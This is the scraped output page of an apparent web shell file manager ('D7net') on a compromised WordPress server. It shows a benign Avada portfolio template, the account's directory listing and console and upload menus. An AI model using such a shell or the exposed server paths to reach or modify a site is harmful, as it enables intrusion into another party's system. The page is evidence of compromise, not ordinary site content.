D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
ltfsolutionsco
/
www
/
wp-content
/
plugins
/
fusion-core
/
templates
/
Filename :
archive-avada_portfolio.php
back
Copy
<?php /** * Portfolio Template. * * @package Fusion-Core */ // Do not allow directly accessing this file. if ( ! defined( 'ABSPATH' ) ) { exit( 'Direct script access denied.' ); } if ( ! class_exists( 'Avada' ) ) { exit( 'This feature requires the Avada theme.' ); } ?> <?php get_header(); ?> <div id="content" <?php Avada()->layout->add_class( 'content_class' ); ?> <?php Avada()->layout->add_style( 'content_style' ); ?>> <?php require 'portfolio-archive-layout.php'; ?> </div> <?php do_action( 'avada_after_content' ); ?> <?php get_footer(); /* Omit closing PHP tag to avoid "Headers already sent" issues. */
Name
Size
Last Modified
Owner
Permissions
Actions
.htaccess
0.193
KB
June 03 2023 12:05:28
ltfsolutionsco
0644
archive-avada_portfolio.php
0.61
KB
October 23 2019 10:16:09
ltfsolutionsco
0755
featured-image-avada_portfolio.php
3.797
KB
October 23 2019 10:16:09
ltfsolutionsco
0755
portfolio-archive-layout.php
16.065
KB
October 23 2019 10:16:09
ltfsolutionsco
0755
single-avada_portfolio.php
11.446
KB
October 23 2019 10:16:09
ltfsolutionsco
0755
2017 © D7net | D704T team